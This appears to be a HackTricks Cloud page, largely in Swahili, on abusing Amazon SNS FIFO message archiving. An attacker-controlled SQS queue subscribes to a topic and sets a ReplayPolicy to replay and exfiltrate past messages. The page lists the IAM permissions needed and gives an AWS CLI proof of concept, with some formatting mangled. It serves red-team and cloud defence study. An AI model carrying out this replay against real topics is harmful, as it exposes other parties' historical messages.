Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Matumizi mabaya ya Amazon SNS FIFO topic message archiving ili kureplay na exfiltrate ujumbe zilizochapishwa awali kwenda kwenye attacker-controlled SQS FIFO queue kwa kuweka subscription ReplayPolicy.

Huduma: Amazon SNS (FIFO topics) + Amazon SQS (FIFO queues)
Mahitaji: Topic lazima iwe na ArchivePolicy imewezeshwa (message archiving). Attacker anaweza Subscribe kwenye topic na set attributes kwenye subscription yao. Attacker anasimamia SQS FIFO queue na anaruhusu topic kutuma ujumbe.
Athari: Ujumbe za kihistoria (published before the subscription) zinaweza kuwasilishwa kwa attacker endpoint. Replayed deliveries zinaletwa na alama Replayed=true katika envelope ya SNS.

Masharti ya awali

SNS FIFO topic yenye uhifadhi umewezeshwa: ArchivePolicy (mfano, { "MessageRetentionPeriod": "2" } kwa siku 2).
Mshambuliaji ana ruhusa za:
sns:Subscribe on the target topic.
sns:SetSubscriptionAttributes on the created subscription.
Mshambuliaji ana SQS FIFO queue na anaweza kuambatisha queue policy inayoruhusu sns:SendMessage kutoka kwa topic ARN.

Ruhusa za chini kabisa za IAM

Kwenye topic: sns:Subscribe.
Kwenye subscription: sns:SetSubscriptionAttributes.
Kwenye queue: sqs:SetQueueAttributes kwa policy, na queue policy inyoruhusu sns:SendMessage kutoka kwa topic ARN.

Shambulio: Replay archived messages to attacker SQS FIFO

Mshambuliaji anasubscribe SQS FIFO queue yao kwenye mhasiriwa SNS FIFO topic, kisha anaweka ReplayPolicy kwa timestamp ya zamani (ndani ya dirisha la archive retention). SNS mara moja ina-replay archived messages zinazofanana kwa subscription mpya na kuzipa alama Replayed=true.

Notes:

The timestamp used in ReplayPolicy must be >= the topic’s BeginningArchiveTime. Ikiwa ni mapema zaidi, API itarudisha Invalid StartingPoint value.
Kwa SNS FIFO Publish, lazima utoe MessageGroupId (na ama dedup ID au wekesha ContentBasedDeduplication).

End-to-end CLI POC (us-east-1)

```bash REGION=us-east-1 # Compute a starting point; adjust later to >= BeginningArchiveTime if needed TS_START=$(python3 - << 'PY' from datetime import datetime, timezone, timedelta print((datetime.now(timezone.utc) - timedelta(minutes=15)).strftime('%Y-%m-%dT%H:%M:%SZ')) PY )

TOPIC_NAME=htreplay$(date +%s).fifo TOPIC_ARN=$(aws sns create-topic –region “$REGION”
–cli-input-json ‘{“Name”:“’”$TOPIC_NAME“‘“,“Attributes”:{“FifoTopic”:“true”,“ContentBasedDeduplication”:“true”,“ArchivePolicy”:“{"MessageRetentionPeriod":"2"}”}}’
–query TopicArn –output text)

echo “Topic: $TOPIC_ARN”

2) Publish a few messages BEFORE subscribing (FIFO requires MessageGroupId)

for i in $(seq 1 3); do aws sns publish –region “$REGION” –topic-arn “$TOPIC_ARN”
–message “{"orderId":$i,"secret":"ssn-123-45-678$i"}”
–message-group-id g1 >/dev/null done

3) Create attacker SQS FIFO queue and allow only this topic to send

Q_URL=$(aws sqs create-queue –queue-name ht-replay-exfil-q-$(date +%s).fifo
–attributes FifoQueue=true –region “$REGION” –query QueueUrl –output text) Q_ARN=$(aws sqs get-queue-attributes –queue-url “$Q_URL” –region “$REGION”
–attribute-names QueueArn –query Attributes.QueueArn –output text)

cat > /tmp/ht-replay-sqs-policy.json <<JSON {“Version”:“2012-10-17”,“Statement”:[{“Sid”:“AllowSNSSend”,“Effect”:“Allow”,“Principal”:{“Service”:“sns.amazonaws.com”},“Action”:“sqs:SendMessage”,“Resource”:“$Q_ARN”,“Condition”:{“ArnEquals”:{“aws:SourceArn”:“$TOPIC_ARN”}}}]} JSON

Use CLI input JSON to avoid quoting issues

aws sqs set-queue-attributes –region “$REGION” –cli-input-json “$(python3 - << ‘PY’ import json, os print(json.dumps({ ‘QueueUrl’: os.environ[‘Q_URL’], ‘Attributes’: {‘Policy’: open(‘/tmp/ht-replay-sqs-policy.json’).read()} })) PY )”

SUB_ARN=$(aws sns subscribe –region “$REGION” –topic-arn “$TOPIC_ARN”
–protocol sqs –notification-endpoint “$Q_ARN” –query SubscriptionArn –output text)

echo “Subscription: $SUB_ARN”

5) Ensure StartingPoint is >= BeginningArchiveTime

BEGIN=$(aws sns get-topic-attributes –region “$REGION” –topic-arn “$TOPIC_ARN” –query Attributes.BeginningArchiveTime –output text) START=${TS_START} if [ -n “$BEGIN” ]; then START=“$BEGIN”; fi

aws sns set-subscription-attributes –region “$REGION” –subscription-arn “$SUB_ARN”
–attribute-name ReplayPolicy
–attribute-value “{"PointType":"Timestamp","StartingPoint":"$START"}”

aws sqs receive-message –queue-url “$Q_URL” –region “$REGION”
–max-number-of-messages 10 –wait-time-seconds 10
–message-attribute-names All –attribute-names All

</details>

## Impact
**Athari Zinazowezekana**: Mshambuliaji ambaye anaweza kujisajili kwenye SNS FIFO topic yenye archiving imewezeshwa na kuweka `ReplayPolicy` kwenye subscription yao anaweza mara moja kucheza tena na exfiltrate ujumbe wa kihistoria uliotumwa kwenye topic hiyo, si tu ujumbe uliotumwa baada subscription kuundwa. Ujumbe uliwasilishwa una jumuisha flag `Replayed=true` katika envelope ya SNS.

> [!TIP]
> Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Jifunze na fanya mazoezi ya Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
> - **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
>
> </details>